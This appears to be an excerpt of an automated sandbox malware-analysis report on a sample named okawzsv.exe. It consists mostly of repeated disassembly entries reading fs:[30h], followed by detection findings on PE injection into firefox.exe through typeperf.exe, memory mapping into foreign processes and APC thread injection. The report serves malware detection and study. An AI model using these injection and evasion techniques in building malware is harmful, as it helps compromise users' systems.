            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A82835 mov eax, dword ptr fs:[00000030h]5_2_00A82835
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A82835 mov eax, dword ptr fs:[00000030h]5_2_00A82835
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A82835 mov ecx, dword ptr fs:[00000030h]5_2_00A82835
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A82835 mov eax, dword ptr fs:[00000030h]5_2_00A82835
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A82835 mov eax, dword ptr fs:[00000030h]5_2_00A82835
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEC810 mov eax, dword ptr fs:[00000030h]5_2_00AEC810
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEE872 mov eax, dword ptr fs:[00000030h]5_2_00AEE872
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEE872 mov eax, dword ptr fs:[00000030h]5_2_00AEE872
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF6870 mov eax, dword ptr fs:[00000030h]5_2_00AF6870
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF6870 mov eax, dword ptr fs:[00000030h]5_2_00AF6870
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A72840 mov ecx, dword ptr fs:[00000030h]5_2_00A72840
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A90854 mov eax, dword ptr fs:[00000030h]5_2_00A90854
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64859 mov eax, dword ptr fs:[00000030h]5_2_00A64859
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A64859 mov eax, dword ptr fs:[00000030h]5_2_00A64859
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A729A0 mov eax, dword ptr fs:[00000030h]5_2_00A729A0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A609AD mov eax, dword ptr fs:[00000030h]5_2_00A609AD
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A609AD mov eax, dword ptr fs:[00000030h]5_2_00A609AD
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE89B3 mov esi, dword ptr fs:[00000030h]5_2_00AE89B3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE89B3 mov eax, dword ptr fs:[00000030h]5_2_00AE89B3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE89B3 mov eax, dword ptr fs:[00000030h]5_2_00AE89B3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEE9E0 mov eax, dword ptr fs:[00000030h]5_2_00AEE9E0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A929F9 mov eax, dword ptr fs:[00000030h]5_2_00A929F9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A929F9 mov eax, dword ptr fs:[00000030h]5_2_00A929F9
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2A9D3 mov eax, dword ptr fs:[00000030h]5_2_00B2A9D3
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF69C0 mov eax, dword ptr fs:[00000030h]5_2_00AF69C0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A9D0 mov eax, dword ptr fs:[00000030h]5_2_00A6A9D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A9D0 mov eax, dword ptr fs:[00000030h]5_2_00A6A9D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A9D0 mov eax, dword ptr fs:[00000030h]5_2_00A6A9D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A9D0 mov eax, dword ptr fs:[00000030h]5_2_00A6A9D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A9D0 mov eax, dword ptr fs:[00000030h]5_2_00A6A9D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6A9D0 mov eax, dword ptr fs:[00000030h]5_2_00A6A9D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A949D0 mov eax, dword ptr fs:[00000030h]5_2_00A949D0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE892A mov eax, dword ptr fs:[00000030h]5_2_00AE892A
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF892B mov eax, dword ptr fs:[00000030h]5_2_00AF892B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE908 mov eax, dword ptr fs:[00000030h]5_2_00ADE908
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADE908 mov eax, dword ptr fs:[00000030h]5_2_00ADE908
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEC912 mov eax, dword ptr fs:[00000030h]5_2_00AEC912
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A58918 mov eax, dword ptr fs:[00000030h]5_2_00A58918
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A58918 mov eax, dword ptr fs:[00000030h]5_2_00A58918
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA096E mov eax, dword ptr fs:[00000030h]5_2_00AA096E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA096E mov edx, dword ptr fs:[00000030h]5_2_00AA096E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AA096E mov eax, dword ptr fs:[00000030h]5_2_00AA096E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04978 mov eax, dword ptr fs:[00000030h]5_2_00B04978
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04978 mov eax, dword ptr fs:[00000030h]5_2_00B04978
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A86962 mov eax, dword ptr fs:[00000030h]5_2_00A86962
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A86962 mov eax, dword ptr fs:[00000030h]5_2_00A86962
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A86962 mov eax, dword ptr fs:[00000030h]5_2_00A86962
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AEC97C mov eax, dword ptr fs:[00000030h]5_2_00AEC97C
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AE0946 mov eax, dword ptr fs:[00000030h]5_2_00AE0946
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68AA0 mov eax, dword ptr fs:[00000030h]5_2_00A68AA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68AA0 mov eax, dword ptr fs:[00000030h]5_2_00A68AA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AB6AA4 mov eax, dword ptr fs:[00000030h]5_2_00AB6AA4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA80 mov eax, dword ptr fs:[00000030h]5_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA80 mov eax, dword ptr fs:[00000030h]5_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA80 mov eax, dword ptr fs:[00000030h]5_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA80 mov eax, dword ptr fs:[00000030h]5_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA80 mov eax, dword ptr fs:[00000030h]5_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA80 mov eax, dword ptr fs:[00000030h]5_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA80 mov eax, dword ptr fs:[00000030h]5_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA80 mov eax, dword ptr fs:[00000030h]5_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A6EA80 mov eax, dword ptr fs:[00000030h]5_2_00A6EA80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B34A80 mov eax, dword ptr fs:[00000030h]5_2_00B34A80
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A98A90 mov edx, dword ptr fs:[00000030h]5_2_00A98A90
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9AAEE mov eax, dword ptr fs:[00000030h]5_2_00A9AAEE
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9AAEE mov eax, dword ptr fs:[00000030h]5_2_00A9AAEE
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AB6ACC mov eax, dword ptr fs:[00000030h]5_2_00AB6ACC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AB6ACC mov eax, dword ptr fs:[00000030h]5_2_00AB6ACC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AB6ACC mov eax, dword ptr fs:[00000030h]5_2_00AB6ACC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A60AD0 mov eax, dword ptr fs:[00000030h]5_2_00A60AD0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A94AD0 mov eax, dword ptr fs:[00000030h]5_2_00A94AD0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A94AD0 mov eax, dword ptr fs:[00000030h]5_2_00A94AD0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8EA2E mov eax, dword ptr fs:[00000030h]5_2_00A8EA2E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9CA24 mov eax, dword ptr fs:[00000030h]5_2_00A9CA24
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9CA38 mov eax, dword ptr fs:[00000030h]5_2_00A9CA38
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A84A35 mov eax, dword ptr fs:[00000030h]5_2_00A84A35
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A84A35 mov eax, dword ptr fs:[00000030h]5_2_00A84A35
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AECA11 mov eax, dword ptr fs:[00000030h]5_2_00AECA11
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9CA6F mov eax, dword ptr fs:[00000030h]5_2_00A9CA6F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9CA6F mov eax, dword ptr fs:[00000030h]5_2_00A9CA6F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A9CA6F mov eax, dword ptr fs:[00000030h]5_2_00A9CA6F
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADCA72 mov eax, dword ptr fs:[00000030h]5_2_00ADCA72
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADCA72 mov eax, dword ptr fs:[00000030h]5_2_00ADCA72
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66A50 mov eax, dword ptr fs:[00000030h]5_2_00A66A50
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66A50 mov eax, dword ptr fs:[00000030h]5_2_00A66A50
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66A50 mov eax, dword ptr fs:[00000030h]5_2_00A66A50
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66A50 mov eax, dword ptr fs:[00000030h]5_2_00A66A50
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66A50 mov eax, dword ptr fs:[00000030h]5_2_00A66A50
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66A50 mov eax, dword ptr fs:[00000030h]5_2_00A66A50
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A66A50 mov eax, dword ptr fs:[00000030h]5_2_00A66A50
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70A5B mov eax, dword ptr fs:[00000030h]5_2_00A70A5B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70A5B mov eax, dword ptr fs:[00000030h]5_2_00A70A5B
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70BBE mov eax, dword ptr fs:[00000030h]5_2_00A70BBE
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A70BBE mov eax, dword ptr fs:[00000030h]5_2_00A70BBE
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8EBFC mov eax, dword ptr fs:[00000030h]5_2_00A8EBFC
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68BF0 mov eax, dword ptr fs:[00000030h]5_2_00A68BF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68BF0 mov eax, dword ptr fs:[00000030h]5_2_00A68BF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A68BF0 mov eax, dword ptr fs:[00000030h]5_2_00A68BF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AECBF0 mov eax, dword ptr fs:[00000030h]5_2_00AECBF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B0EBD0 mov eax, dword ptr fs:[00000030h]5_2_00B0EBD0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A80BCB mov eax, dword ptr fs:[00000030h]5_2_00A80BCB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A80BCB mov eax, dword ptr fs:[00000030h]5_2_00A80BCB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A80BCB mov eax, dword ptr fs:[00000030h]5_2_00A80BCB
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A60BCD mov eax, dword ptr fs:[00000030h]5_2_00A60BCD
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A60BCD mov eax, dword ptr fs:[00000030h]5_2_00A60BCD
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A60BCD mov eax, dword ptr fs:[00000030h]5_2_00A60BCD
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8EB20 mov eax, dword ptr fs:[00000030h]5_2_00A8EB20
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A8EB20 mov eax, dword ptr fs:[00000030h]5_2_00A8EB20
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B28B28 mov eax, dword ptr fs:[00000030h]5_2_00B28B28
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B28B28 mov eax, dword ptr fs:[00000030h]5_2_00B28B28
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADEB1D mov eax, dword ptr fs:[00000030h]5_2_00ADEB1D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADEB1D mov eax, dword ptr fs:[00000030h]5_2_00ADEB1D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADEB1D mov eax, dword ptr fs:[00000030h]5_2_00ADEB1D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADEB1D mov eax, dword ptr fs:[00000030h]5_2_00ADEB1D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADEB1D mov eax, dword ptr fs:[00000030h]5_2_00ADEB1D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADEB1D mov eax, dword ptr fs:[00000030h]5_2_00ADEB1D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADEB1D mov eax, dword ptr fs:[00000030h]5_2_00ADEB1D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADEB1D mov eax, dword ptr fs:[00000030h]5_2_00ADEB1D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADEB1D mov eax, dword ptr fs:[00000030h]5_2_00ADEB1D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5CB7E mov eax, dword ptr fs:[00000030h]5_2_00A5CB7E
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF6B40 mov eax, dword ptr fs:[00000030h]5_2_00AF6B40
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AF6B40 mov eax, dword ptr fs:[00000030h]5_2_00AF6B40
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B2AB40 mov eax, dword ptr fs:[00000030h]5_2_00B2AB40
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B08B42 mov eax, dword ptr fs:[00000030h]5_2_00B08B42
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B10CB5 mov eax, dword ptr fs:[00000030h]5_2_00B10CB5
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADCCA0 mov ecx, dword ptr fs:[00000030h]5_2_00ADCCA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADCCA0 mov eax, dword ptr fs:[00000030h]5_2_00ADCCA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADCCA0 mov eax, dword ptr fs:[00000030h]5_2_00ADCCA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00ADCCA0 mov eax, dword ptr fs:[00000030h]5_2_00ADCCA0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A88CB1 mov eax, dword ptr fs:[00000030h]5_2_00A88CB1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A88CB1 mov eax, dword ptr fs:[00000030h]5_2_00A88CB1
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A58C8D mov eax, dword ptr fs:[00000030h]5_2_00A58C8D
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A92CF0 mov eax, dword ptr fs:[00000030h]5_2_00A92CF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A92CF0 mov eax, dword ptr fs:[00000030h]5_2_00A92CF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A92CF0 mov eax, dword ptr fs:[00000030h]5_2_00A92CF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A92CF0 mov eax, dword ptr fs:[00000030h]5_2_00A92CF0
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5CCC8 mov eax, dword ptr fs:[00000030h]5_2_00A5CCC8
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04C34 mov eax, dword ptr fs:[00000030h]5_2_00B04C34
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04C34 mov eax, dword ptr fs:[00000030h]5_2_00B04C34
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04C34 mov eax, dword ptr fs:[00000030h]5_2_00B04C34
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04C34 mov eax, dword ptr fs:[00000030h]5_2_00B04C34
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04C34 mov eax, dword ptr fs:[00000030h]5_2_00B04C34
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04C34 mov eax, dword ptr fs:[00000030h]5_2_00B04C34
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00B04C34 mov ecx, dword ptr fs:[00000030h]5_2_00B04C34
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00A5EC20 mov eax, dword ptr fs:[00000030h]5_2_00A5EC20
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AFCC20 mov eax, dword ptr fs:[00000030h]5_2_00AFCC20
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 5_2_00AFCC20 mov eax, dword ptr fs:[00000030h]5_2_00AFCC20
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004168A7 GetProcessHeap,2_2_004168A7
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_004130E4 SetUnhandledExceptionFilter,2_2_004130E4
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeCode function: 2_2_00413115 SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00413115

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Windows\SysWOW64\typeperf.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6DE060000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\okawzsv.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeSection loaded: unknown target: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeSection loaded: unknown target: C:\Windows\SysWOW64\typeperf.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: unknown target: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: unknown target: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeSection loaded: unknown target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\typeperf.exeThread APC queued: target process: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\typeperf.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF6DE060000Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\okawzsv.exeProcess created: C:\Users\user\AppData\Local\Temp\okawzsv.exe C:\Users\user\AppData\Local\Temp\okawzsv.exeJump to behavior
            Source: C:\Program Files (x86)\IYoshqWerzIprHBCPdfEPpIdlDWELdHpbnwEORdyHIvPLlmSGUBiWwCjvgdHXCkf\zIlFieNVyhhCXAVrseNWP.exeProcess created: C:\Windows\SysWOW64\typeperf.exe C:\Windows\SysWOW64\typeperf.exeJump to behavior
            Source: C:\Windows\SysWOW64\typeperf.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000000.1350947161.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000A.00000002.3734895314.0000000001450000.00000002.00000001.00040000.00000000.sdmp, zIlFieNVyhhCXAVrseNWP.exe, 0000000D.00000002.3735362141.00000000015F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
